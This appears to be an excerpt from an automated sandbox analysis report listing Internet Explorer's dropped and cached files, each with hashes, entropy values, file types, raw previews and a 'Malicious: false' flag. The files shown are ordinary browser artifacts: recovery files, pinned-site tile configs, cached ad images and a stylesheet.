Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{24DDE3A9-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28120
Entropy (8bit):	1.9081812179522095
Encrypted:	false
SSDEEP:	192:rWZ5Ql6Hk0jR2tWFMxle6H+CG1e6Hn6H+Cqr:rSeQEmAEGfqC2vCi
MD5:	567E53EC3CDC958CF6FAD5B924F3EB9A
SHA1:	8A2D8E3EFE4297B574F54F9A2B69C1DDEAB35A51
SHA-256:	CE6383DB6FB9A995D3A30F402BD7CB2C2470680B4CE020C7C0AB0CB8CFDD9092
SHA-512:	B0DDB6EEF33B3E7A5CA7F66EE10E49B9E95690A4C48E28267D55CC9CFA444FC0C6B6652782BF90C85974F10425AFD9CEA80613FB3093E66286C4D8FBD38F5160
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{2BB8F01A-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	24896
Entropy (8bit):	1.778324262033605
Encrypted:	false
SSDEEP:	192:rToZ1pQEE6KokMtj0/O20ZMW08hM0JApy8svrx2sdApg:rMYaeIAUv6e4yrwM
MD5:	68E0E6BDF58C20A1C5E09D4813F0F692
SHA1:	8C6B2254E1DAFC86A47830321572B7C1DA93FDE6
SHA-256:	F447CAB4BAC0738C988FFA667E53C158BF0718136C2B92BA4091DF7A8C6D6352
SHA-512:	A402C998730D1F06617F27034A7C2FA4899E2C97F79E84BA6CEF38500F2E9365F283237FCD7F2279E589BAEF0B9F19AB2E4D011CB5617379DA1E6272AA12F028
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B10F1F22-C49D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	370608
Entropy (8bit):	3.620212968252092
Encrypted:	false
SSDEEP:	3072:SZ/2Bfcdmu5kgTzGteZ/2Bfc+mu5kgTzGtLZ/2Bfcdmu5kgTzGt5Z/2Bfc+mu5kL:rhNOS
MD5:	21F0A74BE68BA79EAB9408F208F617DC
SHA1:	F279C6C589012FED9BBBB1308B34D052BA55C581
SHA-256:	4E9EAB229D1544E6BD4D7A7C4358FCEA118C00881AE4AAF111ECD442E434B151
SHA-512:	6E99F14C96C9302D0868BE96BCAEAD169EC6F02603B2FD6AA76191F42FE3989020188DEC65937FFD3E09DDFF7805DB4C00D2AA37673B617715ACBB67F9E543CD
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E30F6C06-C49D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27572
Entropy (8bit):	1.9105955792174625
Encrypted:	false
SSDEEP:	192:rK+ZE7Ql66bWk+1jn9L2nXVWnhMndF5d5UsZO/15d5UsZOGfA:rxtPT4n9CnXsn6n75wsZOd5wsZOb
MD5:	B854E6212B1C9496766B7BD1CD82A4CB
SHA1:	DC8D6F7C9DB086620FDF1683BF434C929C12E38F
SHA-256:	34D90D7DBF1F1074DA0B828E3FEDCB18A2AEE45FFC22E64132976D05874ECB12
SHA-512:	7BEBD54C09E72715950287ED43EF2BA13DCD62620BA507FBCB255BB00B14FED52A293257B6BDDA8B8228D7E221EDE9977CA1C025729A2A5A8C6410402CEBFD42
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F0E7C154-C49D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.913036903625741
Encrypted:	false
SSDEEP:	192:rXZIQY6KkBjV2eWWsM4Zigg1uG1iqgg1uBA:rJxjjdMeNpw2ueNua
MD5:	09B74D7D7A3830FC905FF6799980BCB2
SHA1:	51DBEB691A2E07F32F6F11B65376A4DC35B3B385
SHA-256:	18722EC84BF0C9DE5BBE06A8FD93A044C849392D6250FC2BCED0BE62AD203EFD
SHA-512:	DACEBD9B3034BF353832989530BA4F5B8BC80C1C220685B8750311B3CA291BC3EC7BB902657C19DD149077C72F259B561F03DC2E28D1FB70249128D30952C0D4
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FC3DF8C4-C49D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27596
Entropy (8bit):	1.9183304929467946
Encrypted:	false
SSDEEP:	192:reZdQR6PkajN2tW9MZtwQRk43lwQRk4iRcA:rqisMUEEOPwQyKwQytR
MD5:	A06F94BFB7CE2CB99EC72445811566B8
SHA1:	18A52C39ADA11B4DE1D75814A0E44699C32FA93F
SHA-256:	0F28AA9E98AECFF4B25F8C4B723BAE6F3A2A08FDBF454277D2276671D3C07D27
SHA-512:	5A0313DFB4A5ED4F831C596C6336E348714ED79EE304F618A2FFC1CE73BB6AAB68B50F510BC642D2886D28D506688FCA43C9684B734662C18FB0B6DAC8B5297F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FC3DF8C6-C49D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28152
Entropy (8bit):	1.9222066894504375
Encrypted:	false
SSDEEP:	96:rKZVQ96DBSNjl2xWRMlxvoG+/TMPksHoG+/TMCA:rKZVQ96DkNjl2xWRMlxvFPlHFCA
MD5:	AB9F5A1EF1F635AA486FAC751C44DEBF
SHA1:	938CA12A81D8604C9654CF048FF80AA7A15576D1
SHA-256:	436D3D653CFFD7CFCCA7E66F2122BFA339C804DDA80239C132B07B19F37ED0FB
SHA-512:	E714F8FAD9FBF93A9A9A155AA82A08C04A87410BC35F1861211255A06FD8658BCF436D585E3E9E2E5FB01AD9AF6C6559A9C0CB91861540961B9A013AE53FE57B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.089586546900516
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEDo3so3anWimI002EtM3MHdNMNxOEDo3so3anWimI00OYGVbkEtMb:2d6NxOoocoqSZHKd6NxOoocoqSZ7YLb
MD5:	49DB0D187BAB64DB181671D6AAA3F8B2
SHA1:	DC3F6CFBDC396ECFC43077F75C97CBBCCC05E741
SHA-256:	92F0C5A0B8E2EC65FBA030775F4607477C03F262D4F9815680044FB748B102F1
SHA-512:	80C8D297BBB0B01A52BF44870C35D5FF1EE489FE05F9577D0790EDDF45EECABF8B60FDB2038E41279F8216191B45A8FC51AC789C4676FB216C9FB7B79240F256
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.11562137728101
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kk2h2anWimI002EtM3MHdNMNxe2kk2h2anWimI00OYGkak6EtMb:2d6NxroSZHKd6NxroSZ7Yza7b
MD5:	5B0E07D55D78A56F36A760CF5465605E
SHA1:	4EE226396A8FF6820B3FF4F45050E16A1E43FCB4
SHA-256:	EA6D2669D7AB8AE928580EE91D6C9516A7F3EC2BB7C2A3D2A0905F90C35C6F2C
SHA-512:	F172EE24C231AFDCFC29BD71F094A75022FC3468AE450BA4821FB8A9AC8069613DF7EB29A4E2F6E0B89284E367A7310ED6B3A99CD6A54F31C8D088798CBF439E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x8f397021,0x01d758aa</date><accdate>0x8f397021,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x8f397021,0x01d758aa</date><accdate>0x8f397021,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.106928167123152
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLDo3so3anWimI002EtM3MHdNMNxvLDo3so3anWimI00OYGmZEtMb:2d6NxvvocoqSZHKd6NxvvocoqSZ7Yjb
MD5:	F635ACA05DD325A31F183483D942194C
SHA1:	C0912D0EDB4F6EBDA5F50A99F56F6650F489FE6F
SHA-256:	A0BE232E2346D2FE9D94A3C431AB1EC72CFED840F2C727BD3458DBCA0E667BCD
SHA-512:	F134979B35F88C5396629BDF8241B3A16A32A50E866957E4A667C7E73A142D7FE332A98469FAA250BA1624A5D6643A3EE82779C9BE6E84A4F89E2B7667535380
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.104988158289216
Encrypted:	false
SSDEEP:	12:TMHdNMNxiDo3so3anWimI002EtM3MHdNMNxiDo3so3anWimI00OYGd5EtMb:2d6Nx2ocoqSZHKd6Nx2ocoqSZ7YEjb
MD5:	7B9EE1C04E09F2785A91598E84C55629
SHA1:	9EC4B1F7FB80609DE3A12908A1AA49C9A5B8ED30
SHA-256:	222C159CD365E04139D1A6408AEAC8CE7ADD545E4658395EF831A0893E42A4E0
SHA-512:	B4843C0E0E7C3A1033FB221496E9151676D718335F24ED137746DE9BE854881DED81FA487973D2438F4BD78AA6FF9444C518BB4CAFAC88D061EDA47C34494D9D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.123888000064777
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwDo3so3anWimI002EtM3MHdNMNxhGwDo3so3anWimI00OYG8K075Es:2d6NxQsocoqSZHKd6NxQsocoqSZ7YrKG
MD5:	D22C7691A29678F83844E248741533D8
SHA1:	919158A7869606027B3FD846D17BCA04FA9D1965
SHA-256:	DFAE2244FC674D2BBCABEC80691A1888D4318491777121681A5FB3F994FB04C9
SHA-512:	BFEA82BF73C1D33485C3052895C9C3D879F9787403CAC251A44EA98285602DD5C378A06E98F62759079E9B7819845C911CC7380E27F1F6760C9B1B7EE2256B97
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.090778478117085
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nDo3so3anWimI002EtM3MHdNMNx0nDo3so3anWimI00OYGxEtMb:2d6Nx0DocoqSZHKd6Nx0DocoqSZ7Ygb
MD5:	16994A93C980DA6F9EDC1BC3DEBB007E
SHA1:	A153B52E2A1101CCB1EDC11B3E68E595A28153AB
SHA-256:	0511527154000AB0ECBEF0E240310EDC46DAB57240BCB4C8C9A115F6767C8C15
SHA-512:	C64D36DA312B82A58B3A03655CB18304A9EBEE814B8C5ED983973211DCC2DE92B94A68D5B29281BE641E2CEFD9E8D180809E328FF7E439813BCE53AEA2B6F635
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.129221826228311
Encrypted:	false
SSDEEP:	12:TMHdNMNxxDo3so3anWimI002EtM3MHdNMNxxDo3so3anWimI00OYG6Kq5EtMb:2d6NxFocoqSZHKd6NxFocoqSZ7Yhb
MD5:	F6911FBB5C870B48CED2E9C175B1C569
SHA1:	57E27783AC023F6208728C569CE3AFBA473FE9FF
SHA-256:	54CA6FE4BCA21C08E7540E3045E6050753FDD39592E4093AF471172FB666829C
SHA-512:	0F014EE579170253CFE67B0C2526CDF0D07B8B33362CB29BFEA5E00F06A4C77F8962E141CC056FB71B17CBA30E02E8E3D31F312BFC8ABDE8024ACF128C68AA58
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.107911908907757
Encrypted:	false
SSDEEP:	12:TMHdNMNxcDo3so3anWimI002EtM3MHdNMNxcDo3so3anWimI00OYGVEtMb:2d6NxgocoqSZHKd6NxgocoqSZ7Ykb
MD5:	7C5CFA4B94C96B419A4D3AEF03EE7A51
SHA1:	CED178ED6D6911FA071C5DB1A17E5C95DAD00461
SHA-256:	1FEE0186208C91D298CCB755F775BE942E736C399EF993A3DC2915C8FBDBAF63
SHA-512:	C91819C22741AB749D904C690B802AA3199A4D774DD764DA8362858D9B54BB1D7042B3E4EE2A3D8C248E78EF79DAE082E1CAE6571EAA7D1F225A0C41DB824ADA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.0903718391335
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnDo3so3anWimI002EtM3MHdNMNxfnDo3so3anWimI00OYGe5EtMb:2d6NxbocoqSZHKd6NxbocoqSZ7YLjb
MD5:	265CCB3E4BB68ED4D8D2FD59B757943B
SHA1:	E3FE8A5C049B4BE534B10DF7263ACFE8E88568DD
SHA-256:	2BF46D29747B265DFEA346FE4B4468A4268CA042EE39ED1859C46D5D4AC8A6D2
SHA-512:	A48C808A5C5548C82EB7B1427D8B372279F826581B78BC009555176D3DAAEEAF8DE6517FF38A44BA6A9E1FAFDA2E47C3CF41EF5F414AB67A2F1FE6BD9417E12D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.03700505061355
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGC0on:u6tWu/6symC+PTCq5TcBUX4bgf
MD5:	169C8F7E8BEFEAF3F10E26A8E45C49B5
SHA1:	54672F893A4EBC2DC83D08ABDA0FFDD35B0CEB57
SHA-256:	D95FF14F4F41F7792807A541291EA676746E273735D1215B48F5012DC38ECABF
SHA-512:	60E3D4A4A377224C978C099754D69B257FA50AB35AF17982EF9903B59D2FCBA847377732F8AD12046485086D4E71C2FF8E438795183FEDF24AF40DB0CA603ADD
Malicious:	false
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........j&.`....j&.`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\1606410237805-945[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 622x325, frames 3
Category:	downloaded
Size (bytes):	112547
Entropy (8bit):	7.984536281964378
Encrypted:	false
SSDEEP:	3072:M0Xfvrjn9V/4OwvtBFwDW3bQTRCKhHq+4LJ70ib5KSTJ:ffvrjn9VAfFwDhIKhHq+WJ70JSTJ
MD5:	AB11438EAD5B07BA5AA1938C41B3259C
SHA1:	C381410142132C44D6918E25E186569A97A74318
SHA-256:	0EB4330907A55DD44D5572DF21CD5465324B83EA4890484AEE497097B5A231FB
SHA-512:	CA10FB283C15B1905DFC2C6576692ADC46A81B78C65312955CAE8DAA38B665E6932BAB6F4A166E69CCDB5D012014F36F668A91AD9D6DF615CF1E52DB2A401423
Malicious:	false
IE Cache URL:	https://s.yimg.com/lo/api/res/1.2/V2crpAJeakj_9YEn1xys_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWluaTtxPTEwMA--/https://s.yimg.com/av/ads/1606410237805-945.jpg
Preview:	......JFIF.............C....................................................................C.......................................................................E.n..............................................z................!..........!..1."AQ..aq..#2..........$38BR.%46vw...&'7Wbrsux..(59:Cg...DGS...Vdft........HTUXeh............................................q...........................!1.AQ.."aq.26......#Buv.....$3457RUrt.....%&bsw......'8CTc.....DGSVWd....(e..Efg................?..0............P-.......<~...R.<H....RR.....`.B.m.S....#.#..o.+..Q.6S...w'Av.6.!eZ~..{.=/.\|.JL.b`.0L=..R.y.m.t...g.N.7.,.k3~..,\\.P...%=...F.`.,..5%].z.o....S...28.....Y.7v.0P&...Z..-o..E....'zZaO1.<...Y<...t..&....k..C...3.q.{B...IIr.X.R...{.m..,..",M..%J...c.C.ZS.J..B.....L.@K..E..a......h...P(#..Z..H ...`.tC.jzNU--..%....h&..H.....<...Lvh`fQ..@...!...J.u.V.......[}.pE.3F......S.ya....k.....H.M..(0o.x..(+..YH j...........WfQ...\.H.J.7..7.......W.....U...1...^.4....o,.Lq...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\264bf325-c7e4-4939-8912-2424a7abe532[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	58885
Entropy (8bit):	7.966441610974613
Encrypted:	false
SSDEEP:	1536:Hj/aV3ggpq9UKGo7EVbG4+FVWC2eXNA6qQYKIp/uzL:Di3gyq9Ue7EVsCjeXuS
MD5:	FFA41B1A288BD24A7FC4F5C52C577099
SHA1:	E1FD1B79CCCD8631949357439834F331043CDD28
SHA-256:	AA29FA56717EA9922C3D85AB4324B6F58502C4CF649C850B1EC432E8E2DB955F
SHA-512:	64750B574FFA44C5FD0456D9A32DD1EF1074BA85D380FD996F2CA45FA2CE48D102961A34682B07BA3B4055690BB3622894F0E170BF2CC727FFCD19DECA7CCBBD
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/3/45/152/198/264bf325-c7e4-4939-8912-2424a7abe532.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................E.........................!...1."AQ.aq..#2.B.....$Rb...3...C...%&4.r..................................B.........................!1A.."Qa..2q.B.......#..Rr.$3b4....%CDc............?....]..l;.q.`.e...=..??n.\..).."..[K.W.u('$d$+.c...;.......R...(....N.~.J,g...-.....-H.[vI....n!.g......F... ...r..>%..b.l...".....~7.k..s..r....u...0...)........x........4.(Ik...EM.S...n4rN.V..88.J..~.....Q.FJ..A.D.-D.tk'?.F.......IY.]......O~=3.N....rr.u( .....'.h}.,.......3[[...q.....g...&.O.....z...k.n.:~.)-S(..M....:.?(?.2206..g..."..S........~.#.........=.....~.<,G.............B..\l6..@Jr=...(.....N.....xi.....}...o.:F@$...>.N8..~........6e&51.Rzd$....A.l.lw..b..._.....tb]\|`.t.....w........KLp...'.F.?......_.........b.a..6T...P...HIRv.F..1..A.M......2:...C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\2d-0e97d4-185735b[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	249857
Entropy (8bit):	5.295039902555087
Encrypted:	false
SSDEEP:	3072:jaPMUzTAHEkm8OUdvUvOZkru/rpjp4tQH:ja0UzTAHLOUdv1Zkru/rpjp4tQH
MD5:	B16073A9EC93B3B478EC2D5305BAB0E8
SHA1:	446E73EF46D83EE7BE6AFC3F7707D409DFE3FFF3
SHA-256:	6561EBD5D1938217C45AD793DA4DCF4772B5B6E339C2B4A1086AB273EBB0865A
SHA-512:	19B2F38AF4AD3DB28F1823D94928DEABEF5FC5D1B61EF7E4DAE5E242ADB7403C0BE7F30BFAF07A259DB31C35ED9A9A043928FB3655F47D9C063B38E5C3FD9CEF
Malicious:	false
